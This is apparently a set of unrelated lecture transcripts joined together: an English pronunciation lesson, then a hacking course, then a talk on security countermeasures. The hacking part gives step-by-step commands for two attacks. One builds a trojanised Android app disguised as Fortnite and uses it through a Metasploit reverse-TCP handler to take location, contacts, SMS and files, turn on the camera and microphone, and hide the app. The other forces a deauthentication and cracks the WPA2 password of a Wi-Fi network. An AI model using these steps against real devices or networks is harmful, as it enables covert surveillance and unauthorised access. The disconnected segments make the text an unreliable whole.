Now, what did word stress mean? It says emphasis on certain syllables in a word. Say, for example, I have the word which is also my hobby, photography. Okay? If I have to break this into syllables, how many syllables do I have? Photography, which means I have 4 syllables. Okay? Now, I'm going to use another word which is related to the first word. Which is photograph. And how many syllables do I have here? Photograph. Now pay attention. When I pronounce this particular word, photograph, the correct pronunciation is photograph, which means I am stressing on this particular syllable, which is the first syllable. Please give me the photograph. Now, when you speak to someone, stop using the word pic. Please send me a pic. Now, pic means P-I-C-K. It's a short form of picture, but please don't use that word. It sounds pretty bad and it's very casual and informal. So use the word photograph or picture. So in this case, this particular word has 3 syllables and I pronounce this as photograph, which means I'm stressing on the first syllable. But when I look at this particular word, I pronounce this as photography. How do I pronounce? Photography. And how many syllables do I have here? Photography. 4 syllables. But in this case, I stress on the second syllable. That is what word stress is all about. So when we talk about pronunciation, not only the pronunciation of each syllable or the entire word, but also the word stress come into the picture. So here I pronounce this as photograph. Here I pronounce this as photography. Clear? What's the next one? Sentence stress. Now in word stress, I was emphasizing on a particular syllable in a word. In sentence stress, I emphasize on a certain word in a sentence, which means the entire word itself is stressed upon. So let me show you an example. So sentence stress, I'm going to write a sentence. Okay, so let me change the color so that you know that this is an example for you. The sentence is, you cannot get an admission in the university unless you score a minimum of 90% in your entrance test. Now, which word do you think should get the stress? Because here I'm notifying someone orally. You cannot get an admission in the university unless you score a minimum of 90% in your entrance test. So unless is the word which should take the stress. So that's a sentence stress. Let me give an example where the stress will change to denote what exactly I'm trying to communicate.
you have to pay a penalty of 5,000 to get the certificate. Now here I'm going to stress on have. You have to pay a penalty of 5,000 rupees to get the certificate. Now I want to write the same sentence, but I'll show you if I add another word how the meaning will change, or what I'm trying to say will change. Alright, here we go. The first sentence, you have to pay a penalty of 5,000 rupees to get the certificate. Second sentence, you have to pay a penalty of 5,000 rupees only through a demand draft to get the certificate. Now, the word only is taking the stress, because I'm emphasizing there is no other way you can pay the penalty to get the certificate. It's accepted only through a demand draft. But the first one, all I'm saying is you have to pay a penalty. So that's exactly what a sentence stress is. When you're speaking to someone, please remember I'm speaking or I'm talking about specifically about oral communication. So when you're communicating with someone, it could be over the phone, it could be face to face. This sentence stress takes more importance when you cannot see the person. If you're speaking to the person over the phone, you're giving an information. When you emphasize on a particular word in a sentence, they get the message more clearly. Now, if I'm speaking to face, I can use a gesture. I can say you have to pay a penalty. So I use this word, you have to. So the have and the hand coming down, it's coordinated subconsciously. So it's really underlined for you in your mind. You have to pay a penalty to get the certificate. And if I'm talking about the second sentence, I say you have to pay a penalty of 5,000 rupees only through a demand draft. So now this gesture has shifted from have to only. So when I'm speaking face to face, it's easier to understand because other person can see me. But when I'm speaking to the person on the phone, they can't see this gesture, right? Now this gesture is coming very naturally to me. Even when you're speaking on the phone, we use our hands. We don't sit like a robot and speak. But the other person cannot see. So that's where your intonation comes into the picture. The fourth point which you see on the particular slide is intonation. Now what do we mean by intonation? Intonation is the rise and fall of our voice as we speak. Now this rise and fall is very important. But before that, the point is there as linking, joining certain words together. So let me explain what do we mean by linking, and then I will explain in detail what do we mean by intonation. Alright. So let me take the same slide. I want to quickly show you the example of linking here. Please give me 2 eggs. Now when I pronounce this, I can combine. Now in order to understand what do I mean by this, you need to get a little knowledge on let me quickly explain what do I mean by this. You need to get a quick knowledge on vowel sounds. So when I say 2, I am using the sound oo. When I am saying eggs, I am using the sound a. So 2 egg. So this is this word is ending with a vowel sound. This word is starting with a vowel sound. So when you have 2 words next to each other, one ending with vowel sound, another one starting with a vowel sound, you can combine or link
these two sounds together. Okay? For example, if I have the word two eggs, I can just use this particular sound. What do I mean by this? For example, two eggs. So I'm using way sound in between these two eggs. So when I talk about linking in detail, you will understand what do I mean by this. I know it's a little confusing. Let me move over to intonation. Now, intonation, as it reads here, it says the rise and fall of a voice as we speak. Now, there is correct intonation, there is incorrect intonation. Let me quickly explain what do I mean by that. If I'm asking a question, for example, are you going to the market? Are you going to the market? So when I say, are you going to the market, there is a rising tone. Now, what do I mean by rising tone? Let me quickly display. This particular word I'm just trying to make it easier for you. Let me change the color so that you can see it clearly. So this particular word, the last word in the question, are you going to the market? Are you going to the market? Now, are you going to the is flat. Are you going to the market? This is going up because the last word denotes like it's a question. Now, when you're speaking, a lot of people ask a question, but it sounds like a statement. So, when you are speaking, your statement has to be flat, and when it's a question, the last word has to be a rising tone. For example, if I say, I'm going to the market. So here, let me add the line for you so that you can understand what do I mean by this. I'm going to the market. Now, this is a statement and it's a flat intonation. But when I say, are you going to the market? Then it's a rising tone. Now, mistakes that a lot of people do in terms of intonation is specific to making a mistake in terms of rising and dropping tones, where you can get confused. Is it a question or a statement? For example, if I ask a question, now when the answer comes like a question. For example, if it's a quiz program and I ask who was the first say Vice President of India. How many of you know who was the first Vice President of India? You have to know this answer. Very, very important. If you are a student, you definitely need to know who was the first Vice President of India. And it's his birthday tomorrow, and we celebrate that as the Teacher's Day, right? Sarvapalli Radhakrishnan. He was the first Vice President of India. So when I ask a question, who was the first Vice President of India? The answer is S. Radhakrishnan. Some people say S. Radhakrishnan. Now, it goes on a rising tone. Now, it doesn't come as an answer. It comes as a guess, or it comes as a question. Am I right? Is this S. Radhakrishnan? So, when you are ending or when you are responding with a rising tone, it doesn't sound like a statement. It sounds more like a statement. Okay? That's why this intonation in terms of oral communication is very important.
Now, there is no intonation when it comes to written communication because you're not speaking, you're just reading, right? So their punctuation makes a difference. But when you're speaking, your intonation is of the primary importance. Another example which I want to give you, which is pretty important. When you are giving an information in terms of numbers, for example, can you please give me your phone number? And the answer is, my number is 98854-74156. This is my phone number. Now, this is an example. It's actually not my phone number. Don't call this number. Okay? Now, some people just give this information as 98854-74156. Now, you need to allow the other person to make a note of it. Now, in India, this number can be given in parts of 5 plus 5. For example, my number is 98854-74156. So, my number is 98854-74156. Now, this is also difficult to make a note of. You won't remember. So, the best way to do is to break it into 3 and 3. How do I do that? My number is 988-547-4156. Okay? This is a better way to give the number because it's easier to understand and keep a track of. So, instead of breaking 5 plus 5, I've broken into 3 plus 3 plus 4. My number is 988-547-4156. Now, this is also a part of intonation. For example, if I'm giving a bank account number, okay, I'm just typing random numbers. When you have such a long string of information, the better way to give that number is in terms of pairs, in terms of twos. My bank account number is 45745828624523146332. Now, don't again break it into 63 and 2. You can just combine the last 3 if you have an odd number there. So, this is also an important element in terms of intonation. When you're giving the information, you break it down so that your listeners can understand it clearly. Now, one point to be noted here. When I'm giving this series, now let me reduce this. No, let's keep it this way. When I'm giving this series, the first method or the first intonation I'm using is, let me reduce this so that I can have a smaller example. And the number, so I'm giving this information. The series, the number is 624523146332. Now pay attention. How did I say 632? Let's repeat again. 624523146332. For every 2 digit, the second digit, my tone is going up. Pay attention. 624523146332. The moment I drop my tone, that means it's the end of the series. This is a very important aspect of intonation. Now imagine if I'm not dropping this tone, it will sound like as if it's going to continue. 624523146332. Now 2, the moment I say 2 on a rising tone, it means I'm expecting, or my audience is expecting one more number. But the way I say 14632, the moment I say 2, it's dropping, that means it's end of the series. Another mistake that people do is they drop it way too low and you can't hear. And they say 624523146332. Now the 2 is so low, they always ask, I'm sorry, what is the last number again?
That's why it's important the last unit of your string should be louder, but a drop tone. So it will be 6-2, 4-5, 2-3, 1-4, 6-3, 2. My volume went up, but my tone, my intonation is flat. Now these are the finer aspects of a very good oral communication. No matter if you're speaking to the person face to face or over the phone, they can understand you very clearly. And in order to be heard or in order to be comprehended very clearly, your pronunciation has to be absolutely perfect. So as a part of the first pillar of communication, I'm going to speak in detail about the pronunciation aspects for English language. Okay? Thank you for tuning in today. Please post your questions, whatever doubts you have in terms of pronunciation. If you're watching this on YouTube, please post your questions on the comment section. If you're watching it on Mana TV, please go back to Mana TV, the channel on YouTube, Amravati channel. So please post your questions. I will take a look at it and I will provide you with the answer. So we'll continue with the same session tomorrow where I'll focus on pronunciation. Thanks for tuning in. Have a good day. Bye-bye. Hello everyone, welcome back to our discussion about how hackers are using rats to compromise our systems and take over full control of our devices. So in our last session, we have discussed about how hackers are able to take control of our Windows based computers using remote access trojans or rats. So for this, we have gone with the Kali Linux operating system and we have used the package called the FatRat. Now FatRat is designed to help hacker create a client part using which hacker will take over the control of a user's computer. Now we are going to use the same application, the FatRat, to create a client application which will be targeted towards our mobile phones. So here today, if we see with most of the user activities, most of them are dependent on their mobile phones rather than their computers for doing any of the online transactions or maybe communicating with someone, exchanging their emails or messages and all this. And at the same time, hackers have also become smart to take over control of users' mobile phones and then try to monitor all the activities. So in this case, when we speak of mobile phones, the largest market share is with Android operating system. So here I am going to show you how Android operating system or mobile phones or tablets which are running on Android operating system are being compromised. So let us see with how a hacker can compromise a mobile phone by tricking us. Now let us go with the practical part. So let us start with the FatRat package. So as usual, to start with the application, we give a command as FatRat. Okay, there seems to be some error with my internet connectivity. Let me just check this. Okay, seems like I am not connected to the proper network. Okay, so now let us check with our network connectivity. Okay, it says like we do not have a proper IP address on the interface. So let me just show you how do we configure IP addresses.
Let me obtain IP address through my DHCP. If config ATH0. Okay, looks like we have IP address. Now let us start with this. So the command we have to give is fatrat. So this will start with our fatrat application. Okay, so now it says like internet and all is connected properly. So same as earlier, fatrat would check for all the required dependencies to see if everything is working fine. So if everything is okay, then we have the menu option available as usual. So here earlier we have used the option number 6, that is creating a fully undetected backdoor using PwnWinds. So this is when we are trying to target a Windows computer, but now as discussed we will be targeting a mobile device which is running on Android operating system. So I'm going on with option number 1, that is creating a backdoor using MS-of-Venom. So MS-of-Venom is a package which is available in Kali Linux within Metasploit framework. So this MS-of-Venom has been designed to help us create the client part. So we have multiple options, so I'm using the option as MS-of-Venom. Now within MS-of-Venom, as we can see here on the screen, we can create backdoor applications for different kind of operating systems, for Linux, Windows, Android, Macintosh, or we can also go with some web technologies like PHP, ASP, JSP and all. But here I'll be choosing option number 3, which is creating an backdoor application or creating a signed Android package. So option number 3 is chosen. So here it says I have an IP address as 192.168.1.103. So here my listening host address or the hacker's IP address is 192.168.1.103. And the listening port, so this can be any port here, so I can take this port as 4567. I'm just taking the port number as 4567. Now it is asking us what should be the name of the file. So whatever the client application that we are going to create, what should be the name of this? So for the client application, let me take the name as Fortnite. So I'm just giving the name as Fortnite, so that for the end user I'll be telling that this is a Fortnite game and they can download and install it. So once the name has been given, now it is asking us what should be the payload or what should be the kind of attack method. So here I'll choose the attack method as Android Meterpreter Reverse TCP, which is a third option. So once the options have been chosen, application would generate the payload and also the application. So it will create a valid APK file which we can distribute it to our end user. Okay, so now the file has been generated. So once we are back into the menu, it means the APK file has been created. So now let us minimize this, we don't require this now. So once we go back to our home menu, so here we have the fatrat package. So within fatrat package there is a folder called backdoor. So here we can see we have a APK called Fortnite. So now this is the client application of our RAT, or this is a client application of the package what we will be distributing it to the end user. So let us place this APK into our web server. So here as we know Kali Linux have a web server inbuilt. So I'm just trying to place this application here, and this is how the web page looks like. So if a user wants to download Fortnite application, he can directly click on this and he will be able to get the application here. So far what we have done is we have created the fake application or the client part of the RAT using fatrat, and then we are also placing this on the default root directory of our Apache server. So the next step is to create the server part. So for creating the server part, let us go with MSF console.
So to initiate this, the command to be given is msf console. Now this will start the Metasploit framework console and give us access to this. So here, as we can see, we have a prompt for Metasploit console. So now let us give some commands which would prepare our Kali Linux to be as a server. So the first command is use exploit multi-handler. So here, multi-handler is a service which is responsible for accepting all incoming connections from the user. So here we are going to use the exploit as multi-handler, and then let us set the payload. So the payload is Android Meterpreter reverse TCP. So the payload here is Android Meterpreter reverse TCP. So earlier we have used this payload as Windows Meterpreter reverse TCP when we are targeting Windows operating system. So here, as we are targeting Android package, our payload will be Android Meterpreter reverse TCP. Then let us set the L host. So the L host is 192.168.1.103, which is our Kali Linux IP address, and the L port is 4567. So this is the same port number what we have used for creating the client path. And then we say exploit -j. So now our Kali Linux machine is ready to accept incoming sessions. So here, let me just download and run this package on one of the Android device here. So once the victim downloads and installs this application, end user will be able to run the application package, assuming that this is the actual game. But here what happens in reality is that's not the actual game there, but instead you are actually giving him with the client part of the Trojan. And here, as we can see on the screen, once the application has been downloaded, it is creating a remote session to the end user. So here, let us get connected to the victim's device. So once the session has been created, here we can see that the session number is 1. So I'm getting connected with the first session. So here in the Meterpreter, let me see what sort of a device is this which is connecting to the hacker's computer. So the command to do that is sysinfo. So here, as we can see, it's running on Android version 8.1.0. That's almost the latest version except for very few devices. And it says kernel version is 3.10.108. So it shows us what is the version of Android that is installed on the device. So we know what operating system is installed on the victim's computer or on the victim's mobile or tablet device. Now we can give a command geolocate. So this shows us where exactly the user is present based on the location coordinates. So here, if we check with this location coordinates, this is how it is showing us. So all we have to do is copy the location coordinates and go back to Google search. So when we try to access Google Maps with this particular location coordinates, we'll be able to see where is the user present. So that's how it shows us the location of the person. So based on how effective is the GPS, you'll be able to pinpoint the person or the user maybe like around a 1 or 2 meters range. So you'll know the exact location of the person. Or not only with the location of the person, you will also be able to get all the information from his mobile phone. Like say, I can give a command dump contacts. So this will directly download all the contacts from the user mobile and put it onto your system. Or in the same fashion, we can also give options like dump
call logs or SMS messages and all. So here, as we can see, based on how many contacts are available and all, it takes some time to download all the content. So it says like it has saved it into your system with this particular file name. In the same way, just like contacts, we can also say like dump SMS. So this will directly download all the SMS messages from the user's mobile into your system, right? And not only this, you will also be able to say send SMS. So when you say like send SMS, you will also be able to create and send a message to someone from victim's mobile. And not only this, you will also have full access to the victim's mobile file system. So we can say cd/sd card/. So once we give this command and we say ls, you will be able to open or you will be able to view all the contents of the file system there, what all things are present on his device. And similar to what we have seen earlier with the Windows system, you will be able to use the same command downloads to download any of the content. So you can say download and give the particular file name. You will be able to download it from victim's mobile device or their tablet to your system. But be very careful when you are trying to download this. So let me say I'll try to download this particular file. Be very specific about what things you are trying to download, because if you are trying to download a very large file, like say a 1 GB or 2 GB content, maybe end user doesn't have that sort of bandwidth available, so it might disconnect your session. So be very careful with this. So here, as we can see, it's just trying to download that particular file and save it onto our computer. So it is saving it. Open G apps. So this is how we have the package available. So this is a file which has been downloaded from the user's mobile device. And not only this, we will also be able to run a command webcam snap. So this will actually try to click a picture of the surroundings or the environment, whatever the camera on the victim's phone is able to see. So once we give a command like webcam snap, just tries to click a picture and then tries to show us. So here maybe the image quality is not so good, but still let me just try to zoom in. Okay, so this is how it just tries to show me. But let us say like we are not satisfied with just a picture, we will also be able to do a live stream. So once we say like do a web camera stream, it just tries to open your web browser and then tries to put up a live stream of what all things the victim's mobile device is able to view. Still taking some time. Okay, there seems to be a session disconnection here. So let us just try to run this application again. Exploit -J. So it's just trying to run this. Now let us wait for the victim to connect back. Sessions -I space 3. So here, as you can see, it's like I'm just trying to point it towards my system and all. So we can see like there's a live stream of what all things the victim's camera is able to see. So what all things the victim camera is able to view, we'll also have a live stream of all that. And all these things would happen without the knowledge of end users. So end user would not be aware of what all things are actually happening there. So he will just think like his mobile phone is idle, not doing anything. But in reality, his mobile phone is actually sending in all the recording stream back to the hacker. Now this is actually happening in because victim is just trying to download and install an application
somewhere outside the official Play Store or the App Store. Now the only problem is when we see with most of the users, if they have to purchase some games or apps, they are not really ready to do that. So instead of purchasing it from the official Play Store, they go to a third party store where they can download the applications, download them and then install it. Now this is what technically we call them as side loading the apps. So side loading apps is not at all a security thing. So security would be compromised because of this, and if you try to download and install an application, there is no guarantee that the application what we are getting is genuine. It may be modified by the hacker. So once it has been modified by the hacker, all the activities of end user will be visible to the hacker, and not only running with your live camera and all, hacker can also say record mic and give a duration. So for the next 120 seconds, what all things that are happening on the user's surrounding or the victim surrounding will be recorded through the microphone and will be sent to the hacker. And the worst thing, hacker can also say hide app icon. So the application whatever you have downloaded and installed, the Fortnite game, that icon itself will be disappearing from the app drawer. So as an end user, you will just think like maybe that application was not installed properly or that was uninstalled or something happened, because you don't even see that application icon there. Now this will also make it very, very difficult to see what actually is happening on your device. So you'll have to be very, very careful about what sort of tools or games that you are trying to download and install on your mobile devices. So the best way is always try to download things from the official app stores or the Play Stores. Do not download it from a third party website, because you are never really sure whether it is clean or it has been injected with something else. It may be a malware. So not only hacking into users' computers, but hackers are also capable of hacking into your mobile phones. So Kali Linux can be used to do all these kind of activities, that is hacking into someone's mobile phone or maybe into their systems and all. Now not only with these particular activities, Kali Linux can also be used to help a hacker hack into someone's wireless networks or Wi-Fi networks. So today if we see with most of us, be it in a home network or be it in the corporate environment, we are all dependent on wireless networks. So generally when we speak of any wireless network, we'll be having a Wi-Fi access point connecting us to the internet, and now we will connect all our mobile devices or laptops and all to this Wi-Fi. So let me show you what actually happens here. So we'll be having a Wi-Fi access point, and now this particular Wi-Fi access point can give us signals in certain range. Let us say it can give us signals in a range of 20 meters. So this is how the access point is available, and this access point has a range of 20 meters. So any person or any mobile device which is capable of connecting with a wireless network, if it is present within this 20 meters range, will be able to identify that there is a wireless network. Assume there is a system here A which has a Wi-Fi card connected. So it can identify that there is a wireless network available somewhere nearby and will be able to connect. In the same way, I am also taking up another user B. So these two systems will be able to access internet by connecting into the Wi-Fi network. Not only with internet, they will also be able to access our local network or the local resources. Now assuming A and B are both employees of this particular organization, or they belong to this particular wireless network, so there is no problem when these two people connect to the Wi-Fi and access something. But assume there is a hacker who is within this particular range. So now as we say, our Wi-Fi access point can give signals for a 20 meter range. Hacker who is also present in the same range will be able to view that there is a Wi-Fi access point available. So what he can do is he can see the SSID of our Wi-Fi network. Now SSID is nothing but the Wi-Fi name. So whatever the name that we are assigning for our Wi-Fi network is called as SSID, Service Set Identifier. Now hacker based on the SSID will identify that okay, there is a Wi-Fi network somewhere nearby, but when he tries to connect to this particular network
as we all have seen in most cases, your Wi-Fi access point would ask us for a password. It would request us to type in a password, and based on the password we will be able to authenticate and join the network. But here, as a hacker doesn't know what is the actual password of this network, he'll have to break the password. To do this, hacker can use a technique called sniffing, which we have discussed earlier. So hacker will have to use sniffing, that is trying to capture the traffic between a client system and access point, between a client system and access point. So hacker will have to capture the traffic between the client computer and access point, and then he will be able to get the actual password. Now here, when we speak of the passwords, our Wi-Fi network have different sort of passwords like WEP, Wired Equivalent Privacy, WPA, Wi-Fi Protected Access, or WPA2, Wi-Fi Protected Access version 2. So these are the three different types of encryption standards that are available, which will protect our data. So here, when we speak of WEP, this uses an algorithm called RC4 with 40-bit encryption. Now WPA uses an algorithm RC4, same as what was used in WEP. WPA2 uses an algorithm AES, which is different from the other two standards. But when it comes to the key, both WPA and WPA2 would use a 48-bit IV, which would initiate your session, and then a 128-bit master key, which is used for securing the data. Right. So here, when we see, out of all the three different types of encryption standards, WEP, which is only using a 40-bit encryption, has the weakest encryption standard. WPA and WPA2 are using two different keys, a 48-bit key for the initial session and the 128-bit key for the data transfer. Now here, when we speak of this 128-bit key, this is again unique to every device. So if there are 10 systems connecting to the access point, 10 systems will have 10 different 128-bit keys given by the access point. So things are actually more complicated when it comes to WPA or WPA2 networks. And now today, if we see with most of our devices or our operating systems, they do not even support WEP networks. You will only have support for either WPA or WPA2. So now let us see how a hacker can sniff the traffic with this WPA or WPA2 networks and steal the passwords. So for this, hacker would have some specific requirements. That is, hacker would require a compatible Wi-Fi card, and he would require Kali Linux operating system. So Kali Linux is already available. Now we just have to make sure that our Wi-Fi card is compatible, right? So I'll be showing you which specific card is compatible for this sort of activities. Now let us see what actually hacker does. Now, as we said, without knowing the password, we will not be able to capture this. So hacker will have to use sniffing technique to capture the traffic between one of the associated device, one of the client and the access point. To do this, hacker will have to keep his Wi-Fi card into something called monitor mode. Now monitor mode is similar to Prometheus mode, like what we have done in the wired or Ethernet networks. So placing his Wi-Fi card into monitor mode, hacker will be able to capture the traffic. But problem with WPA or WPA2 networks, here not only using two different keys for encryption, but when it comes to the authentication, user's device will have to authenticate only once. User's mobile device has to authenticate only once. Means when
device is first time connecting to the Wi-Fi network, it has to authenticate, or maybe when the device is disconnected or it is going away from the access point, coming back into the network range, then it will have to connect. So authentication would not be repeated multiple times. So assuming I have an access point and there's a laptop or maybe there is a mobile phone which is already connected to this particular access point. Maybe now this client system is connecting for the next 8 hours or 10 hours. We don't have to re-authenticate multiple times. So only for the first time when we are joining the network, we have to authenticate, and if that is successful, we can continue for any number of hours or any number of packets can be exchanged. But if we are trying to restart the computer, or maybe we are going away from the access point's range and then we are again coming back in, or maybe for some reason access point itself was restarted, we will have to re-authenticate. Now here hacker is going to use the exact same thing to launch something called a de-authentication attack. Hacker is going to launch something called a de-authentication attack, where hacker would force all the connected devices, like all the connected laptops or mobile phones, to disconnect from the access point once, and when they are trying to reconnect, hacker can capture the password. That is because, as we said, client systems are only connecting to the access point once. So as a hacker, if all the devices are connected to the access point, there is no way for us to do something. That means there is no way for us to capture the password. Either we have to wait till a new device is connecting to the network, that is, a new device should be joining the network, or we'll have to go with de-authentication. And de-authentication is always the best option here. So let us see what actually hackers are trying to do and how they will try to crack the password. So for this, I'm going to use an inbuilt suite in Kali Linux called Airmon suite. So let me just quit the FatRat package. Now we don't require this anymore. So let me directly run this Airmon suite and see if we can capture the passwords or not. So for this, I have to connect an external Wi-Fi card to my system. So once the Wi-Fi card is connected, I just have to run a command airmon-ng. So it has to identify my wireless card and show us the result. So here, as we can see, if it is showing us with the result, what is the name of our wireless card, what is the chipset, and what is the driver being used and all, so then it means that our Wi-Fi card is compatible for this activity. So once we make sure that our Wi-Fi card is compatible, next let us try to place this Wi-Fi card in Prometheus mode. So for this, we say airmon-ng start WLAN 0. So here WLAN 0 is the name of our Wi-Fi card. So here, as we can see, it says that our Wi-Fi card is placed in monitor mode, and the monitor mode interface has given a name as WLAN 0 mon. So WLAN 0 mon is the name of the Wi-Fi interface, whatever has been placed in monitor mode. But here, if you observe, application also says that there are 3 services running in my system which might interfere with my activities. So I would say stop the services. To do that, I give a command kill and the process ID, whatever the number is shown here for that specific process, we will have to kill that. Okay, so I'm just trying to kill the unwanted services. Now here, if I say if config, I should be seeing another Wi-Fi interface called WLAN 0 mon, which is my monitor mode interface. So once the monitor mode has been enabled, now we'll have to see what all Wi-Fi networks are available around us. So for this, we say
aerodump-ng WLAN 0 mon. So once we say aerodump-ng, we will be able to see all different Wi-Fi networks which are available here around us. So we just have to let this application run for some time so that we will be able to see all the Wi-Fi networks and also like if there is some traffic passing on through or not. So here as we can see, there are so many networks available. So let me just try to stop this. So here I am trying to crack a network called Wi-Fi, which is using WPA2 encryption, and there is also some data traffic going on. Now for us to launch an attack and compromise this particular network, all we need is the MAC address of the access point. So here sometimes most of us think like if we enable the option like hiding the MAC address or hiding the name of the SSID will protect our Wi-Fi networks from hacking attacks. That's not true. So here hacker would just require the MAC address of an access point. So here let us start capturing all the traffic. So for this I'll be running a command aerodump-ng -bssid, give the MAC address of the access point, -c, we'll have to mention the channel. So here when we speak of the channel, we'll have to check it here. So let us say so this particular access point is running on channel number 7. So we'll have to mention the channel as channel 7. And let us try to write all the files or all the traffic, whatever we are trying to capture between the mobile phone of the user and the access point into a file called test. And all these activities should be done using WLAN 0 mon interface. So here it just tries to capture all the traffic on channel number 7. But as we can see, we don't see any kind of WPA handshake. That is because the client is already connected to the access point. So now let us just try to create this de-authentication attack. So for this we say airreplay-ng -0. -0 is for launching the de-authentication message, which tells all the client systems to disconnect from access point. So I'll say send this message 2 times. So this will be broadcasted twice as if it is coming in from this access point. So I'm saying that the source of the message should be looking like the access point's MAC address. And for all these activities, I'm going to use WLAN 0 mon interface. Now see, I'm trying to broadcast this message twice, and here we have a WPA handshake available. Now here if you see, there's no prompt on my system or somewhere that your Wi-Fi has been disconnected and you'll have to reconnect. So this all happens in the background. So once this has been captured, if we actually look into the files which are saved here on my desktop, we can see that there are multiple files like test-01.cap, test-02.cap and all. So these are the files which have been captured by our aerodump command. So now what we are doing is we are going to launch an attack on this particular 2 files to see whether we are able to get the actual password. To do that, I'm going to run a command aircrack-ng. So aircrack is going to help us to crack the passwords. So I'm going to use a password dictionary file called passwords to crack the password of this particular access point with the MAC address. And then I have to say try to crack the file called test-02.cap. So here as we can see, it tries to crack the Wi-Fi network password and shows what actually is the original password. So here even your wireless networks are not really safe if someone can capture the traffic between your user's computer or the user's mobile device and the access point.
So how do we stop these kind of attacks and all? How do we protect our wireless networks or our mobile devices and all? We will discuss in the next session. Okay, so far we have seen like what all different attacks hackers are able to do. So then we will discuss about the countermeasures in the next session. Thank you all. Hello everyone, welcome back to our discussion about how hackers are trying to compromise our systems and how do we secure them. So in the last few sessions we were discussing with different kind of attack methods how hackers are trying to compromise our systems or our servers. So today we will be discussing about how do we protect our resources and what all countermeasure techniques we have to follow. So here when we speak of countermeasures, countermeasures are those techniques or procedures which are to be followed to secure our networks or our data from different sort of intrusions. So in short, countermeasure is just a precaution or maybe a procedure what we use to protect our data. So here let us discuss about countermeasure techniques for different sort of attack methods what we have been discussing so far. So first we have taken an assumption that hacker is somewhere on internet and he is going on with collecting the details about our network and then trying to launch an attack. So the first technique that we have discussed is something called footprinting. So here just let me rewind what actually happens in footprinting. In footprinting, hacker is collecting all the information about a targeted host or a targeted network from publicly accessible resources. Like say hacker wants to find out all the details about our server or about our networks. He is going on with different websites like Netcraft, technicalinfo.net, or maybe hacker can use some tools like SmartWhois or SamSpade to find out details about our servers. So here when we speak of details, hacker is trying to find out what kind of operating systems are being used, what sort of applications are installed, where exactly the servers are located, and what range of IP addresses are available. So here as we say, hacker is collecting all the details from publicly accessible resources. That is, in short, is getting information from internet. So here, being an administrator of any organization, though our responsibility is to protect our data, we will not be able to stop this footprinting activities of a hacker because hacker is not directly accessing our resources or our servers. Hacker is trying to collect all the information from internet which is already available on a public domain. So here when hacker is performing footprinting, we will not even be aware of his activities. So footprinting, we will not be able to prevent it. So let us go with the next step that a hacker does. So in hacker, after going on with footprinting, he is going on with scanning. So here when we speak of scanning, hacker is trying to scan our networks or our servers to find out more information. So here when we speak of scanning, there are things like identifying live host, understanding how many systems are actually present in the given range of IP addresses, understanding what all open ports are present on a system, and then how many vulnerabilities are present. So here let us see one by one. So here when we speak of identifying live host, we said hacker is trying to use some tools called IP address scanners or IP scanners. Now we all know that these IP scanners are using ping request. So here all the IP address scanners are trying to use ping to find out how many systems are present in our network. So here when we speak of IP address scanning or identifying the live host, we can deny all ICMP traffic so that if a hacker is trying to identify how many systems are present in our network, we will be able to prevent his activities. And then when we speak of open ports, so that is the next step that every hacker does. So in open port scanning, hacker is trying to find out
what all open ports or what all services are running on a machine. So to prevent this, we say we'll have to disable all the unused services. So maybe your server operating system may have so many different kind of services running in. So here the countermeasure is, if we do not require all those services, we will have to disable this. Not only on a server, this can be the same case with your firewall or even with the router. And we can also use a firewall to stop this port scanning. So when we use a firewall and we receive request from hacker's computer asking us for multiple open ports, a firewall would deny that. So we'll see what actually a firewall is in the same session. And then speaking of vulnerability scanning, so this is the last step of scanning activities, wherein a hacker tries to identify what actually is the weakness on a system, what is the vulnerability of a system. So here we all know that vulnerabilities can be present on the operating system or on the application whatever is installed, or maybe because of the configuration. So here, to prevent vulnerabilities or vulnerability scanning to be successful, we will have to go with operating system and application level hardening, or we can also use an intrusion prevention system which can identify and block this vulnerability scanning attempts. So we will see what actually this operating system hardening means. So here in operating system hardening, this is a procedure of securing a system's operating system. So it can be your laptop or your desktop, or it can be your server. So the process what we follow to protect our operating system is called as operating system hardening. Similar things can be done with your applications also. So here when we speak of operating system hardening, the first and foremost thing is we'll have to use genuine operating systems. So it is always recommended that we use genuine operating systems and applications, so that even if a hacker is trying to find out some vulnerabilities, it will not be so easy, because genuine operating systems would always receive timely updates from the manufacturer. So your software developers are giving you with all the updates. So any issues which are found have been fixed. Now, not only with the genuine operating systems, we also have to make sure that all the security patches which are released, it can be a security update or it can be in the form of a service pack, we'll have to download and install this. Now here again, when we go with downloading and installing a security patch, there are certain precautions that we have to take. So here when we speak of the precautions, not all security patches are compatible with your existing applications or services. So maybe there is a chance when you download and install a security patch, it might create a conflict or a stability issue with one of your existing application. So the best way is download this security patch and install it on one of the test machines. Check if this security patch is fixing up all the issues or not, and then also try to see if it has any sort of compatibility related issues with any other package or application that we are using. So if it does not have any kind of compatibility related issues, and it is also secure, and it is also trying to fix the existing problem, then we can go ahead and deploy this onto the live environment. So this is how we'll have to go with testing a security patch, and once that is done, we also have to go with some group policies where we can define what actually is a privilege. So here there is a concept called AAA, which is generally used in terms of network devices, which stands for authentication, authorization, and accounting. So these are very common practice that is in place with every network. So here when you speak of the first term, it is authentication, that is who is accessing our resource. It can be a server, it can be a router, it can be a firewall, or it can be any data. So here we have to first authenticate the person. Authentication, as we all know, like say we are trying to access our Gmail, we are giving our email address and password.
or we are trying to access our net banking, we are giving our net banking user ID and password. So here authentication is a process where a user proves to the system that he is a actual person, he is a correct person to access this data. So here authentication can be in a form of a user ID and a password, or authentication can be in a form of your biometric like a fingerprint or a voice recognition or facial recognition. So once a user is verified and authenticated, then the system will have to go with the second step, that is authorization. Okay, user is authenticated, but what can he do? Now the best example here, when we speak of our operating systems, we create different types of user accounts like administrator account and a normal user account. So when we speak of the main differences here, administrator has full privilege. He will be able to install or uninstall applications, activate or deactivate certain services or features of the operating system. So this guy who has administrator privilege will be able to manage everything on the system. It can be on a desktop or it can be on a server. But here when we speak of a normal user account, this user will not have any privilege to add or remove certain applications or enable or disable certain services. He can only use those services which are enabled by the administrator. So authorization is where you give a permission. If a user is logging in, what can he access? Is he permitted to access Firefox? Is he permitted to access my C drive? Is he permitted to access my D drive? Okay, he is permitted to access my D drive. What can he do? Can he only read the information, or can he also write the information, or can he also edit or delete it? So what sort of permissions we are giving in? That comes under authorization. And then finally it comes to accounting. Accounting is where you see which user is actually logging in, from which computer, how long he was logged into the system, so when did he log in, when did he log off, and what all activities he has been doing in. So this is a concept of AAA, or in short we can call it as AAA. It stands for authentication, authorization, or accounting. So this is about user level control. So we are giving some user level controls. What actually a user is permitted to do. So that will also help us properly secure our systems. So we'll have to give certain group policies to control what actually or what sort of data can be accessed by a user. And then we should also be creating a baseline security template, saying like, let us say in my 